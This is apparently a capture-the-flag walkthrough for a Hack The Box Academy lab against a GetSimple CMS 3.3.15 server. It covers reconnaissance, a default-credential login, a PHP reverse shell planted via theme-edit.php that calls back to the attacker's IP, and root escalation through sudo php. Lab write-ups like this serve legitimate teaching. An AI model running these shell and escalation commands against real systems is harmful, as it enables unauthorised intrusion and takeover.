Discover the key insights and strategies to complete the final knowledge check in the “Getting Started” module at Hack The Box Academy. Attackers are given the target IP address and must spawn the target, gain a foothold, and submit the contents of the user.txt flag. After obtaining a foothold on the target, learn how to escalate privileges and capture the root.txt flag.
Given IP Addresses for this guide:
Target 10.129.42.249
Attacker 10.10.14.183
Initial Reconnaissance: Nmap Scan
Perform initial information gathering on the target with a nmap scan. I also included the -sV flag to detect service versions.
The results revealed the ports 22 and 80 were open. Port 80 was running Apache httpd which is a common web server software and is hosting a web service on this port.
Investigating Open Ports
I visited the target service at port 80 in a browser to see the web service.
The website revealed a basic website landing page for the GetSimple content management system.
Digging in Further: Directory Discovery
To discover further pages associated with the website like potential login pages or pages with errant credentials I ran a directory discovery service called gobuster. You could also run dirb. I used the command: gobuster dir -u http://10.129.42.249/ -w /usr/share/dirb/wordlists/common.txt
The responses revealed several webpages with 200, 301, and 403 status codes. Notably /index.php and /robots.txt returned 200 status, and /plugins /theme /admin and /data returned 301 status.
Then, I visited the pages in the web browser to see what they were. See below for screenshots of some of the pages.
/index.php
/admin.php
Initial Foothold
Inputting the admin credentials from the /data page into the admin.php login is unsuccessful because the credentials are hashed. However, a few guesses and trial and error revealed the user:admin and password:admin credentials were successful.
Then I had access to the GetSimple content management system dashboard where I could change files, themes, and website plugins.
Poking around the website shows an alert message in the support channel which specifies the version of GetSimple (version 3.3.15).
Use open source research to find exploits related to GetSimple version 3.3.15. I used the CVE database at cvedetails.com
This CVE explains that there is an issue with the admin/theme-edit.php page and allows for remote code execution via the edited_file parameter. To check this, I navigated to the admin/theme-edit.php page to input my own php code at the end of the theme php code. I used <?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.183/4444 0>&1'"); to start an interactive shell on the web server.
Then, start a netcat listener on your local machine, refresh the main web page to load the php code entered. This should result in a shell on your local machine.
Upgrade shell with python3 -c 'import pty; pty.spawn("/bin/bash")’ for improved stability and functionality.
Navigate to the home directory and user mrb3n to view the user.txt flag.
Escalate Privileges
To view commands that can be run with elevated privileges, run sudo -l
Search GTFOBins for php shell exploit examples. I used export CMD=”/bin/sh” followed by sudo php -r "system('$CMD');" Then we have a root shell! Cd to the home directory and cat the root.txt flag 🙂